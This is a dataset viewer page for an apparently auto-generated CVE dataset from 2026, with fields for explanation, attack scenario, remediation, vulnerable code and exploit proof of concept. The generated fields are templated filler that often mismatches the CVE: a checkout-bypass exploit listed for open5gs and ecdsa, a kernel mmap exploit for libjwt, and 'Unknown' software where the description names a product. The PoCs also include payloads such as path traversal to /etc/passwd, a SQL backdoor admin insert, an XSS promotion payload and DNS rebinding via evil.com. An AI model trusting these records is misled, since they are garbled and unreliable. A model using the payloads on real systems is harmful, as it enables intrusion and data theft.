Dataset Viewer
Auto-converted to Parquet Duplicate
cve_id
large_stringlengths
13
15
published_date
large_stringdate
2026-03-27 22:16:22
2026-05-14 20:17:19
cvss_score
float64
0
10
cvss_vector
large_stringclasses
680 values
cwe_id
large_stringclasses
381 values
affected_software
large_stringlengths
1
175
affected_versions
large_stringclasses
530 values
plain_explanation
large_stringlengths
231
4.23k
technical_deep_dive
large_stringlengths
161
409
attack_scenario
large_stringlengths
205
506
remediation
large_stringlengths
369
599
vulnerable_code_example
large_stringlengths
433
1.31k
exploit_poc
large_stringlengths
484
989
CVE-2026-33980
2026-03-27T22:16:22.607
8.3
CVSS:3.1/AV:N/AC:L/PR:L/UI:N/S:U/C:H/I:H/A:L
CWE-943
azure_data_explorer_mcp_server
*
This is a security flaw cataloged in the NVD. The affected application is azure_data_explorer_mcp_server versions *. This defect affects confidentiality, integrity, or availability. CVE details: Azure Data Explorer MCP Server is a Model Context Protocol (MCP) server that enables AI assistants to execute KQL queries and...
Full technical details require reverse engineering the exploit. Impact: scale depends on service exposure to the Internet or intranet. The flaw was discovered by independent researchers or via bug bounty. CVSS 8.3 (high). Vector: CVSS:3.1/AV:N/AC:L/PR:L/UI:N/S:U/C:H/I:H/A:L.
The attacker scans ports and paths to discover the attack surface. The attacker scales the attack with mass Internet scans. The attacker aims to obtain credentials for future access. The PoC works against default installations of azure_data_explorer_mcp_server *.
Prioritize fixes based on Internet exposure and CVSS score. Deploy runtime application self-protection (RASP) as an additional layer. Configure SIEM with specific rules for this attack category. Document the flaw and fix in the team's knowledge base. The fix must be validated specifically for azure_data_explorer_mcp_se...
# Example: Generic security flaw in azure_data_explorer_mcp_server (*) # VULNERABLE: unsanitized user input in processing user_input = request.args.get('input') result = process(user_input) # The code trusts external data without validation. # SAFE: validate, sanitize, and constrain input user_input = request.args.get...
# Exploit PoC: Memory exhaustion via unbounded allocation (azure_data_explorer_mcp_server) # Payload: Request with size=0x7FFFFFFF → server attempts to allocate 2GB # Request: POST /api/upload HTTP/1.1 | Content-Length: 2147483647 → server pre-allocates 2GB # Expected: Memory allocation fails or exhausts system memory;...
CVE-2026-33981
2026-03-27T22:16:22.793
6.5
CVSS:3.1/AV:N/AC:L/PR:L/UI:N/S:U/C:H/I:N/A:N
CWE-200
changedetection
*
Unintentional exposure of sensitive information. The vulnerability impacts changedetection versions *. There is a leak of confidential data to unauthorized actors. Impact documentation: changedetection.io is a free open source web page change detection tool. Prior to 0.54.7, the `jq:` and `jqraw:` include filter expres...
The system does not apply the principle of least information in responses. Impact: API key, password, and token leakage in public logs. The attack surface includes the default service port of changedetection. CVSS 6.5 (medium). Vector: CVSS:3.1/AV:N/AC:L/PR:L/UI:N/S:U/C:H/I:N/A:N.
The attacker uses Nuclei or Nessus to identify targets at scale. The attacker accesses /actuator/env or /.env for credentials. The attacker seeks customer data for extortion or sale. The target is changedetection versions *.
Disable verbose error reporting and stack traces in production. Configure SIEM with specific rules for this attack category. Conduct a post-mortem to identify process gaps that allowed the flaw. Maintain a log of all post-patch exceptions and errors. The fix must be validated specifically for changedetection versions *...
# Example: Git repo exposed (changedetection) # VULNERABLE: .git directory accessible via web server {{ listen 80; root /var/www/app; }} # GET /.git/HEAD returns the repo HEAD, enabling full source-code extraction. # SAFE: deny access to hidden files server {{ listen 80; root /var/www/app/public; l...
# Exploit PoC: Git repository extraction (changedetection) # Payload: GET /.git/HEAD → GET /.git/refs/heads/main → iterative object download # Request: ./git-dumper.sh https://target.com/.git/ output_dir # Expected: Complete source code with commit history, including any accidentally committed secrets, recovered. # Det...
CVE-2026-33989
2026-03-27T22:16:22.950
8.1
CVSS:3.1/AV:N/AC:L/PR:N/UI:R/S:U/C:N/I:H/A:H
CWE-22
mobile_mcp
*
Path validation is insufficient or entirely absent. The mobile_mcp component at versions * exhibits this defect. User-supplied filenames are concatenated directly with the base directory. Advisory analysis reveals: Mobile Next is an MCP server for mobile development and automation. Prior to version 0.0.49, the `@mobile...
User input contains unfiltered dot-dot-slash or absolute paths. Impact: template or log overwrite for XSS or code execution. The vulnerability was introduced in a recent release of mobile_mcp. CVSS 8.1 (high). Vector: CVSS:3.1/AV:N/AC:L/PR:N/UI:R/S:U/C:N/I:H/A:H.
The attacker intercepts traffic with Burp Suite or Wireshark to map requests. The attacker combines path traversal with file upload for webshell deployment. The objective is data theft, persistence, or lateral pivoting. The flaw is exploitable in deployments of mobile_mcp (*).
Use indirection maps: internal IDs instead of exposed filenames. Conduct a post-mortem to identify process gaps that allowed the flaw. Test the fix in a staging environment that mirrors production. Enable detailed logging to detect bypass attempts. The fix must be validated specifically for mobile_mcp versions *. Given...
# Example: Path traversal in download (mobile_mcp) # VULNERABLE: path concatenated without validation filename = request.args.get('file') path = f"/var/www/files/{{filename}}" return send_file(path) # file = ../../../etc/passwd escapes the intended directory. # SAFE: resolve and verify prefix containment from pathlib ...
# Exploit PoC: Double-encoded path traversal (mobile_mcp) # Payload: %252e%252e%252f%252e%252e%252f%252e%252e%252fetc%252fpasswd # Request: GET /download?file=%252e%252e%252f%252e%252e%252f%252e%252e%252fetc%252fpasswd HTTP/1.1 # Expected: URL decode → %2e%2e%2f%2e%2e%2f%2e%2e%2fetc%2fpasswd → second decode by applicat...
CVE-2026-34226
2026-03-27T22:16:23.113
7.5
CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:N/A:N
CWE-201
happy_dom
*
This defect affects confidentiality, integrity, or availability. Affects specifically happy_dom at releases *. Exposure depends on deployment, configuration, and affected version. The published analysis states: Happy DOM is a JavaScript implementation of a web browser without its graphical user interface. Versions prio...
The vulnerability involves interaction between multiple components. Impact: can be combined with other flaws for an exploit chain. The damage scale depends on the affected process's privileges. CVSS 7.5 (high). Vector: CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:N/A:N.
The attacker identifies the vulnerable endpoint or functionality via reconnaissance. The attacker uses scanners (Nessus, nuclei) to detect the vulnerable version. The attacker aims to escalate into the internal network or cloud provider. The target is happy_dom versions *.
Prioritize fixes based on Internet exposure and CVSS score. Consider segmenting the network to limit lateral propagation if re-exploited. Consider hiring a red team to validate fix effectiveness. Train the development team on this vulnerability category. The fix must be validated specifically for happy_dom versions *. ...
# Example: Unsafe deserialization in happy_dom (*) # VULNERABLE: parsing attacker-controlled serialized data obj = parse_binary_format(request.data) # Malformed or oversized input causes crashes or memory corruption. # SAFE: validate structure before and during parsing header = parse_header(request.data[:HEADER_SIZE])...
# Exploit PoC: Race condition exploitation (happy_dom) # Payload: Send multiple concurrent requests to trigger TOCTOU (time-of-check time-of-use) # Request: parallel curl requests: for i in {{1..100}}; do curl https://target.com/api/transfer & done # Expected: Two requests pass the check before either updates state; do...
CVE-2026-4985
2026-03-27T22:16:23.290
4.3
CVSS:3.1/AV:N/AC:L/PR:N/UI:R/S:U/C:N/I:N/A:L
CWE-189
Unknown
Unknown
This is a security flaw cataloged in the NVD. Affects specifically Unknown at releases Unknown. This CVE documents an uncategorized security vulnerability. The technical description states: A vulnerability was identified in dloebl CGIF up to 0.5.2. This vulnerability affects the function cgif_addframe of the file src/c...
The vulnerability stems from a combination of design and implementation issues. Impact: requires PoC analysis for exact determination. Exploitation can be chained with other flaws on the same host. CVSS 4.3 (medium). Vector: CVSS:3.1/AV:N/AC:L/PR:N/UI:R/S:U/C:N/I:N/A:L.
The attacker monitors underground forums for variants and bypasses. The attacker analyzes the patch diff to understand the exact vector. The attacker seeks customer data for extortion or sale. The PoC works against default installations of Unknown Unknown.
Apply the vendor's official patch as soon as it is available. Perform regression fuzzing to ensure the fix did not introduce new crashes. Monitor performance metrics after applying the patch. Include the flaw in tabletop exercises and incident simulations. The fix must be validated specifically for Unknown versions Unk...
# Example: Unsafe deserialization in Unknown (Unknown) # VULNERABLE: parsing attacker-controlled serialized data obj = parse_binary_format(request.data) # Malformed or oversized input causes crashes or memory corruption. # SAFE: validate structure before and during parsing header = parse_header(request.data[:HEADER_SI...
# Exploit PoC: Logic flaw in business process (Unknown) # Payload: Manipulate workflow state transitions (skip payment step, bypass approval) # Request: POST /api/checkout HTTP/1.1 | body={"step":"confirm","payment_status":"paid","amount":0} # Expected: Server trusts client-supplied state; order confirmed without payme...
CVE-2026-4988
2026-03-27T22:16:23.533
3.7
CVSS:3.1/AV:N/AC:H/PR:N/UI:N/S:U/C:N/I:N/A:L
CWE-404
open5gs
2.7.6
The flaw was identified through patch analysis or anomalous behavior. The vulnerable product is open5gs (versions 2.7.6). The exact vector requires reviewing advisories and patch diffs. The NVD entry notes: A security flaw has been discovered in Open5GS 2.7.6. This issue affects the function smf_gx_cca_cb/smf_gy_cca_cb...
The flaw may be emergent behavior from multiple configuration factors. Impact: the vendor has assigned a CVSS score reflecting the severity. The damage scale depends on the affected process's privileges. CVSS 3.7 (low). Vector: CVSS:3.1/AV:N/AC:H/PR:N/UI:N/S:U/C:N/I:N/A:L.
The attacker fuzzes parameters with known payloads to confirm the flaw. The attacker validates the exploit in a lab before a real attack. The objective is financial fraud or selling data on the underground market. The test environment replicates open5gs at version 2.7.6.
Apply defense-in-depth measures while the permanent fix is being tested. Document the flaw and fix in the team's knowledge base. Implement SAST and DAST in the build and deployment pipeline. Perform regression fuzzing to ensure the fix did not introduce new crashes. The fix must be validated specifically for open5gs ve...
# Example: Generic security flaw in open5gs (2.7.6) # VULNERABLE: unsanitized user input in processing user_input = request.args.get('input') result = process(user_input) # The code trusts external data without validation. # SAFE: validate, sanitize, and constrain input user_input = request.args.get('input') if not va...
# Exploit PoC: Logic flaw in business process (open5gs) # Payload: Manipulate workflow state transitions (skip payment step, bypass approval) # Request: POST /api/checkout HTTP/1.1 | body={"step":"confirm","payment_status":"paid","amount":0} # Expected: Server trusts client-supplied state; order confirmed without payme...
CVE-2026-4990
2026-03-27T22:16:23.753
7.3
CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:L/I:L/A:L
CWE-266
Unknown
Unknown
The vulnerability arises from an interplay of multiple components. Observed in Unknown (up to Unknown). There is a confirmed vulnerability reported by the vendor or community. The NVD entry notes: A security vulnerability has been detected in chatwoot up to 4.11.1. The affected element is an unknown function of the fil...
Review of the vendor advisory is required for precise root cause details. Impact: can be combined with other flaws for an exploit chain. Maximum damage occurs when Unknown runs with elevated privileges. CVSS 7.3 (high). Vector: CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:L/I:L/A:L.
The attacker intercepts traffic with Burp Suite or Wireshark to map requests. The attacker combines OSINT to find exposed targets. The attacker intends to establish a foothold for a longer-term campaign. The test environment replicates Unknown at version Unknown.
Validate the fix in staging before deploying to production. Configure automated alerts for new instances of the component. Enable detailed logging to detect bypass attempts. Use threat-intelligence feeds to anticipate zero-day exploits. The fix must be validated specifically for Unknown versions Unknown. Given the high...
# Example: Insecure default configuration in Unknown (Unknown) # VULNERABLE: debug mode and auth disabled by default DEBUG = True REQUIRE_AUTH = False # Debug mode and disabled authentication expose information and access. # SAFE: environment-driven secure defaults DEBUG = os.getenv('ENV', 'production') == 'developmen...
# Exploit PoC: Memory exhaustion via unbounded allocation (Unknown) # Payload: Request with size=0x7FFFFFFF → server attempts to allocate 2GB # Request: POST /api/upload HTTP/1.1 | Content-Length: 2147483647 → server pre-allocates 2GB # Expected: Memory allocation fails or exhausts system memory; OOM killer terminates ...
CVE-2026-33936
2026-03-27T23:17:13.733
5.3
CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:N/I:N/A:L
CWE-20
ecdsa
*
This is a security flaw cataloged in the NVD. Observed in ecdsa (up to *). The exact vector requires reviewing advisories and patch diffs. Per the NVD: The `ecdsa` PyPI package is a pure Python implementation of ECC (Elliptic Curve Cryptography) with support for ECDSA (Elliptic Curve Digital Signature Algorithm), EdDSA...
Isolated reproduction in Docker or VM is recommended for analysis. Impact: may lead to partial or full system compromise under certain conditions. Maximum damage occurs when ecdsa runs with elevated privileges. CVSS 5.3 (medium). Vector: CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:N/I:N/A:L.
The attacker probes for the specific vulnerable ecdsa version using fingerprinting. The attacker monitors Exploit-DB and GitHub for published PoCs. The objective is to degrade the target's reputation or operations. The target is ecdsa versions *.
Monitor IOCs and logs for exploitation attempts. Configure automated alerts for new instances of the component. Establish patching SLAs based on CVE severity. Document the flaw and fix in the team's knowledge base. The fix must be validated specifically for ecdsa versions *. Schedule the patch for the next maintenance ...
# Example: Missing rate limiting in ecdsa (*) # VULNERABLE: no limit on request frequency @app.route('/api/login', methods=['POST']) def login(): user = authenticate(request.json) if user: return token(user) return 'Invalid', 401 # Attackers can brute-force credentials at full network speed. # SAFE: rate-l...
# Exploit PoC: Memory exhaustion via unbounded allocation (ecdsa) # Payload: Request with size=0x7FFFFFFF → server attempts to allocate 2GB # Request: POST /api/upload HTTP/1.1 | Content-Length: 2147483647 → server pre-allocates 2GB # Expected: Memory allocation fails or exhausts system memory; OOM killer terminates pr...
CVE-2026-33991
2026-03-27T23:17:13.913
8.8
CVSS:3.1/AV:N/AC:L/PR:L/UI:N/S:U/C:H/I:H/A:H
CWE-89
wegia
*
An attacker can manipulate query logic to exfiltrate or modify data. The vulnerability impacts wegia versions *. The application fails to separate data from commands in relational queries. The official disclosure details: WeGIA is a web manager for charitable institutions. Prior to version 3.6.7, the file `html/socio/s...
A lack of binding between parameter values and SQL logic eliminates the safe boundary. Impact: direct modification of balances or financial records in the database. The damage scale depends on the affected process's privileges. CVSS 8.8 (high). Vector: CVSS:3.1/AV:N/AC:L/PR:L/UI:N/S:U/C:H/I:H/A:H.
The attacker scans ports and paths to discover the attack surface. The attacker uses second-line SQLi in headers, cookies, or JSON fields. The attacker seeks total control of the host or container. The flaw is exploitable in deployments of wegia (*).
Parameterize every user-supplied value in SQL statements. Revoke any potentially compromised credentials. Configure automated alerts for new instances of the component. Verify the fix did not break critical functionality in staging. The fix must be validated specifically for wegia versions *. Given the high severity, a...
# Example: SQL Injection in login (wegia) # VULNERABLE: string interpolation in query username = request.form['username'] password = request.form['password'] query = f"SELECT * FROM users WHERE user='{{username}}' AND pass='{{password}}'" cursor.execute(query) # username = admin'-- bypasses the password check entirely....
# Exploit PoC: Stacked query backdoor insertion (wegia) # Payload: id=1; INSERT INTO users(username,password,role) VALUES('backdoor','$2b$12$...','admin')-- # Request: POST /api/update?id=1; INSERT INTO users(username,password,role) VALUES('backdoor','$2b$12$...','admin')-- HTTP/1.1 # Expected: Legitimate row updated, ...
CVE-2026-33992
2026-03-27T23:17:14.070
6.5
CVSS:3.1/AV:N/AC:L/PR:L/UI:N/S:U/C:H/I:N/A:N
CWE-918
pyload
0.5.0
The system fetches user-supplied URLs without restriction. The pyload component at versions 0.5.0 exhibits this defect. A URL parser accepts schemes beyond http and https without filtering. The vendor advisory describes: pyLoad is a free and open-source download manager written in Python. Prior to version 0.5.0b3.dev97...
DNS resolution occurs after validation, enabling rebinding attacks. Impact: local file read via file scheme in image or PDF parsers. The flaw has been fixed in builds later than 0.5.0. CVSS 6.5 (medium). Vector: CVSS:3.1/AV:N/AC:L/PR:L/UI:N/S:U/C:H/I:N/A:N.
The attacker fuzzes parameters with known payloads to confirm the flaw. The attacker exploits the server's outbound HTTP client to reach private networks. The objective is financial fraud or selling data on the underground market. The PoC works against default installations of pyload 0.5.0.
Implement alerting on requests to internal IP addresses. Update the incident response playbook with this vulnerability type. Apply the principle of least privilege to all service accounts. Monitor underground forums and Exploit-DB for new variants. The fix must be validated specifically for pyload versions 0.5.0. Sched...
# Example: Unvalidated URL fetch (pyload) # VULNERABLE: fetches user-supplied URL without validation url = request.args.get('url') response = requests.get(url) # url = http://169.254.169.254/latest/meta-data/ returns cloud IAM credentials. # SAFE: allow-list and IP validation from urllib.parse import urlparse import i...
# Exploit PoC: file:// protocol abuse (pyload) # Payload: file:///etc/passwd, file:///proc/self/environ, file:///app/.env # Request: POST /api/fetch HTTP/1.1 | body={"url":"file:///etc/passwd"} # Expected: Server fetches local file via file:// scheme; file contents returned in response body; credentials extracted from ...
CVE-2026-33993
2026-03-27T23:17:14.237
9.8
CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:H/A:H
CWE-1321
locutus
*
This defect affects confidentiality, integrity, or availability. The affected application is locutus versions *. The vulnerability arises from an interplay of multiple components. Impact documentation: Locutus brings stdlibs of other programming languages to JavaScript for educational purposes. Prior to version 3.0.25,...
Isolated reproduction in Docker or VM is recommended for analysis. Impact: affects organizational reputation and regulatory compliance. The vulnerable component is locutus (builds *). CVSS 9.8 (critical). Vector: CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:H/A:H.
The attacker analyzes source code or firmware to find the entry point. The attacker analyzes the patch diff to understand the exact vector. The attacker intends to establish a foothold for a longer-term campaign. The test environment replicates locutus at version *.
Validate the fix in staging before deploying to production. Verify the fix did not break critical functionality in staging. Perform annual penetration testing and after significant architectural changes. Test the fix in a staging environment that mirrors production. The fix must be validated specifically for locutus ve...
# Example: Generic security flaw in locutus (*) # VULNERABLE: unsanitized user input in processing user_input = request.args.get('input') result = process(user_input) # The code trusts external data without validation. # SAFE: validate, sanitize, and constrain input user_input = request.args.get('input') if not valida...
# Exploit PoC: Race condition exploitation (locutus) # Payload: Send multiple concurrent requests to trigger TOCTOU (time-of-check time-of-use) # Request: parallel curl requests: for i in {{1..100}}; do curl https://target.com/api/transfer & done # Expected: Two requests pass the check before either updates state; doub...
CVE-2026-33994
2026-03-27T23:17:14.413
9.8
CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:H/A:H
CWE-1321
locutus
*
A security advisory has been published detailing the impact scope. The affected software is locutus with versions *. Exposure depends on deployment, configuration, and affected version. The NVD entry notes: Locutus brings stdlibs of other programming languages to JavaScript for educational purposes. Starting in version...
The flaw may be emergent behavior from multiple configuration factors. Impact: may lead to partial or full system compromise under certain conditions. The presence of ASLR, NX, and stack canaries partially mitigates the issue. CVSS 9.8 (critical). Vector: CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:H/A:H.
The attacker uses social engineering to gain access to staging or demo environments. The attacker uses the Metasploit framework to automate the exploit. The attacker aims to obtain credentials for future access. The target is locutus versions *.
Apply the vendor's official patch as soon as it is available. Adopt continuous vulnerability scanning in the CI/CD pipeline. Verify the fix did not break critical functionality in staging. Update dependencies and frameworks to non-vulnerable versions. The fix must be validated specifically for locutus versions *. Given...
# Example: Generic security flaw in locutus (*) # VULNERABLE: unsanitized user input in processing user_input = request.args.get('input') result = process(user_input) # The code trusts external data without validation. # SAFE: validate, sanitize, and constrain input user_input = request.args.get('input') if not valida...
# Exploit PoC: Logic flaw in business process (locutus) # Payload: Manipulate workflow state transitions (skip payment step, bypass approval) # Request: POST /api/checkout HTTP/1.1 | body={"step":"confirm","payment_status":"paid","amount":0} # Expected: Server trusts client-supplied state; order confirmed without payme...
CVE-2026-33996
2026-03-27T23:17:14.590
5.5
CVSS:3.1/AV:L/AC:L/PR:N/UI:R/S:U/C:N/I:N/A:H
CWE-476
libjwt
*
There is a missing-null-check flaw. Confirmed in libjwt with builds *. A function assumes its callee always returns a valid pointer. The published analysis states: LibJWT is a C JSON Web Token Library. Starting in version 3.0.0 and prior to version 3.3.0, the JWK parsing for RSA-PSS did not protect against a NULL value...
Debug assertions are removed in production builds. Impact: authentication bypass via failure to check session pointers. The vulnerability was introduced in a recent release of libjwt. CVSS 5.5 (medium). Vector: CVSS:3.1/AV:L/AC:L/PR:N/UI:R/S:U/C:N/I:N/A:H.
The attacker intercepts traffic with Burp Suite or Wireshark to map requests. The attacker uses a race condition to access an uninitialized object. The attacker seeks total control of the host or container. The exploit is tested on libjwt * in a lab environment.
Use fuzzing to find allocation-failure paths. Audit user permissions and roles after applying the patch. Run automated regression tests against the patched component. Notify affected users about the upgrade requirement. The fix must be validated specifically for libjwt versions *. Schedule the patch for the next mainte...
# Example: None returned from dict.get (libjwt) # VULNERABLE: accesses dictionary result without null check config = load_config() db_host = config.get('database')['host'] # If 'database' key is missing, .get() returns None and ['host'] raises AttributeError. # SAFE: provide a default or check explicitly config = load...
# Exploit PoC: Kernel NULL dereference via mmap(0) (libjwt) # Payload: mmap(NULL, 4096, PROT_READ|PROT_WRITE, MAP_FIXED|MAP_ANONYMOUS, -1, 0) → trigger kernel NULL dereference # Request: Map page 0 → trigger kernel code path that dereferences a NULL pointer → kernel reads/writes controlled page 0 data # Expected: Kerne...
CVE-2026-4248
2026-03-27T23:17:14.753
8
CVSS:3.1/AV:N/AC:L/PR:L/UI:R/S:U/C:H/I:H/A:H
CWE-285
Unknown
Unknown
This is a security flaw cataloged in the NVD. The affected software is Unknown with versions Unknown. There is a confirmed vulnerability reported by the vendor or community. Advisory analysis reveals: The Ultimate Member plugin for WordPress is vulnerable to Sensitive Information Exposure in all versions up to, and inc...
Preconditions and the exact vector vary by deployment and configuration. Impact: potential compromise of confidentiality, integrity, or availability. The flaw was discovered by independent researchers or via bug bounty. CVSS 8.0 (high). Vector: CVSS:3.1/AV:N/AC:L/PR:L/UI:R/S:U/C:H/I:H/A:H.
The attacker analyzes source code or firmware to find the entry point. The attacker combines this flaw with others for an exploit chain. The attacker seeks privilege escalation or remote execution. The attack is validated on Unknown with builds Unknown.
Consider isolating the component until a definitive fix is applied. Ensure the patch is verified in an isolated environment before rollout. Conduct security-focused code reviews for all new code. Review access logs for signs of exploitation prior to the fix. The fix must be validated specifically for Unknown versions U...
# Example: Race condition in Unknown (Unknown) # VULNERABLE: check-then-act without synchronization if balance >= amount: balance -= amount transfer(amount) # Two concurrent requests can both pass the check and double-spend. # SAFE: atomic operation with locking with lock: if balance >= amount: bal...
# Exploit PoC: Generic input validation bypass (Unknown) # Payload: Craft input outside expected range (type, size, format, encoding) # Request: Varies by vulnerability; fuzz all input vectors with AFL++ or libFuzzer # Expected: Application enters unexpected state; crash, information leak, or logic bypass depending on ...
CVE-2026-4991
2026-03-27T23:17:19.340
3.5
CVSS:3.1/AV:N/AC:L/PR:L/UI:R/S:U/C:N/I:L/A:N
CWE-79
Unknown
Unknown
This is an HTML/JavaScript injection flaw enabling attacker-controlled scripts. The affected application is Unknown versions Unknown. The application trusts external data when constructing the document object model. The official disclosure details: A vulnerability was detected in QDOCS Smart School Management System up...
Untrusted data reaches a browser sink without going through an escaping function. Impact: SameSite bypass and cross-origin content reading via XSS. The flaw has been fixed in builds later than Unknown. CVSS 3.5 (low). Vector: CVSS:3.1/AV:N/AC:L/PR:L/UI:R/S:U/C:N/I:L/A:N.
The attacker reviews changelogs and patch diffs to understand the fix. The attacker chains XSS with CSRF for destructive actions without interaction. The attacker aims to exfiltrate sensitive information. Exploitation occurs against Unknown (Unknown).
Add X-XSS-Protection and Strict-Transport-Security headers. Integrate security checks into the pull-request review workflow. Monitor performance metrics after applying the patch. Monitor underground forums and Exploit-DB for new variants. The fix must be validated specifically for Unknown versions Unknown. Schedule the...
# Example: Stored XSS in comments (Unknown) # VULNERABLE: stores and displays without sanitization comment = request.form['comment'] db.execute("INSERT INTO comments VALUES (?)", (comment,)) for row in db.execute("SELECT comment FROM comments"): print("<div>" + row[0] + "</div>") # Persistent scripts affect every v...
# Exploit PoC: Stored XSS via comment field (Unknown) # Payload: <img src=x onerror="fetch('/admin/promote?user=attacker',{{method:'POST',credentials:'include'}})"> # Request: POST /comment HTTP/1.1 | Content-Type: application/x-www-form-urlencoded | body=<img src=x onerror=...> # Expected: Every visitor to the page tr...
CVE-2026-4992
2026-03-27T23:17:19.567
4.3
CVSS:3.1/AV:N/AC:L/PR:N/UI:R/S:U/C:N/I:L/A:N
CWE-79
Unknown
Unknown
This is a Cross-Site Scripting (XSS) vulnerability. Observed in Unknown (up to Unknown). The vulnerability allows injection of untrusted markup into web pages. The technical description states: A flaw has been found in wandb OpenUI up to 1.0. This affects the function create_share/get_share of the file backend/openui/s...
The root cause is the absence of contextual encoding in HTML output. Impact: session token and personal data leakage to an attacker domain. Maximum damage occurs when Unknown runs with elevated privileges. CVSS 4.3 (medium). Vector: CVSS:3.1/AV:N/AC:L/PR:N/UI:R/S:U/C:N/I:L/A:N.
The attacker uses search engines (Google Dorks, Shodan) to find exposed instances. The attacker exploits DOM Clobbering to modify security variables. The direct impact is service disruption or data destruction. The test environment replicates Unknown at version Unknown.
Enable Trusted Types to restrict insecure DOM sinks. Perform regression fuzzing to ensure the fix did not introduce new crashes. Adopt continuous vulnerability scanning in the CI/CD pipeline. Apply the principle of least privilege to all service accounts. The fix must be validated specifically for Unknown versions Unkn...
# Example: XSS in HTML attribute (Unknown) # VULNERABLE: user input placed in attribute without encoding $name = $_GET['name']; echo '<input type="text" value="' . $name . '">'; # Input: " onfocus="alert(1) breaks out of the attribute. # SAFE: encode for attribute context $name = $_GET['name']; echo '<input type="text...
# Exploit PoC: Stored XSS via comment field (Unknown) # Payload: <img src=x onerror="fetch('/admin/promote?user=attacker',{{method:'POST',credentials:'include'}})"> # Request: POST /comment HTTP/1.1 | Content-Type: application/x-www-form-urlencoded | body=<img src=x onerror=...> # Expected: Every visitor to the page tr...
CVE-2026-1679
2026-03-28T00:16:04.740
7.3
CVSS:3.1/AV:L/AC:L/PR:L/UI:N/S:U/C:L/I:H/A:H
CWE-120
zephyr
*
The copy operation does not enforce a maximum transfer length. The affected software is zephyr with versions *. The system uses unsafe string-manipulation functions. Advisory analysis reveals: The eswifi socket offload driver copies user-provided payloads into a fixed buffer without checking available space; oversized ...
The null terminator of the source is used as the sole copy delimiter. Impact: arbitrary execution via stack smashing or ROP chaining. Exploitation requires valid low-privilege credentials. CVSS 7.3 (high). Vector: CVSS:3.1/AV:L/AC:L/PR:L/UI:N/S:U/C:L/I:H/A:H.
The attacker enumerates zephyr versions via banners or headers. The attacker uses SEH overwrite on Windows to catch the exception handler. The attacker seeks total control of the host or container. Affected versions: zephyr *.
Use static analyzers (CodeQL, Coverity) in the build pipeline. Perform annual penetration testing and after significant architectural changes. Integrate security checks into the pull-request review workflow. Implement SAST and DAST in the build and deployment pipeline. The fix must be validated specifically for zephyr ...
# Example: unbounded strcpy (zephyr) # VULNERABLE: unlimited copy into fixed buffer char buf[32]; strcpy(buf, user_input); # Input > 32 bytes corrupts the stack and overwrites the return address. # SAFE: bounded copy with guaranteed null termination char buf[32]; strncpy(buf, user_input, sizeof(buf) - 1); buf[sizeof(b...
# Exploit PoC: sprintf format string + overflow (zephyr) # Payload: %s%s%s%s%s%s%s%s (no additional arguments → stack read + potential crash) # Request: GET /report?name=%s%s%s%s%s%s%s%s HTTP/1.1 # Expected: Each %s dereferences a stack value as a pointer; reads arbitrary memory; segfault when reaching unmapped address...
CVE-2026-4987
2026-03-28T02:16:14.793
7.5
CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:N/I:H/A:N
CWE-20
Unknown
Unknown
The system exhibits unsafe behavior under specific conditions. The vulnerable product is Unknown (versions Unknown). Exposure depends on deployment, configuration, and affected version. The official description indicates: The SureForms – Contact Form, Payment Form & Other Custom Form Builder plugin for WordPress is vul...
The defect was cataloged from observed behavior or a patch diff. Impact: can be combined with other flaws for an exploit chain. The vendor published an advisory with CVSS and a detailed vector. CVSS 7.5 (high). Vector: CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:N/I:H/A:N.
The attacker identifies the vulnerable endpoint or functionality via reconnaissance. The attacker scales the attack with mass Internet scans. The attacker seeks customer data for extortion or sale. The target is Unknown versions Unknown.
Consider isolating the component until a definitive fix is applied. Conduct security-focused code reviews for all new code. Use threat-intelligence feeds to anticipate zero-day exploits. Ensure the patch is verified in an isolated environment before rollout. The fix must be validated specifically for Unknown versions U...
# Example: Generic security flaw in Unknown (Unknown) # VULNERABLE: unsanitized user input in processing user_input = request.args.get('input') result = process(user_input) # The code trusts external data without validation. # SAFE: validate, sanitize, and constrain input user_input = request.args.get('input') if not ...
# Exploit PoC: Memory exhaustion via unbounded allocation (Unknown) # Payload: Request with size=0x7FFFFFFF → server attempts to allocate 2GB # Request: POST /api/upload HTTP/1.1 | Content-Length: 2147483647 → server pre-allocates 2GB # Expected: Memory allocation fails or exhausts system memory; OOM killer terminates ...
CVE-2025-12886
2026-03-28T04:16:49.323
7.2
CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:C/C:L/I:L/A:N
CWE-918
Unknown
Unknown
This CVE documents missing destination validation on outbound requests. The vulnerability impacts Unknown versions Unknown. The fetch logic does not block private or loopback IP addresses. The vendor advisory describes: The Oxygen Theme theme for WordPress is vulnerable to Server-Side Request Forgery in all versions up...
The server acts as an open proxy to the internal network. Impact: local file read via file scheme in image or PDF parsers. The precondition is running Unknown with default configuration. CVSS 7.2 (high). Vector: CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:C/C:L/I:L/A:N.
The attacker enumerates Unknown versions via banners or headers. The attacker uses gopher:// to send raw commands to Redis or Memcached. The objective is data theft, persistence, or lateral pivoting. The vulnerable instance runs Unknown without the security patch.
Resolve DNS and block private IPs before fetching. Implement defense in depth: WAF, IDS, EDR, and network segmentation. Configure automated alerts for new instances of the component. Conduct security-focused code reviews for all new code. The fix must be validated specifically for Unknown versions Unknown. Given the hi...
# Example: Node.js SSRF in image proxy (Unknown) # VULNERABLE: proxies images from any URL app.get('/proxy', async (req, res) => {{ const response = await fetch(req.query.url); res.type(response.headers.get('content-type')); response.body.pipe(res); }}); # url = http://169.254.169.254/ fetches cloud metadat...
# Exploit PoC: DNS rebinding SSRF (Unknown) # Payload: http://7f000001.evil.com:8080 (resolves to 127.0.0.1 on second DNS query) # Request: Register evil.com with TTL=0 first resolving to benign IP; after validation, DNS changes to 127.0.0.1 # Expected: URL validation passes on first DNS resolution; actual fetch resolv...
CVE-2025-15445
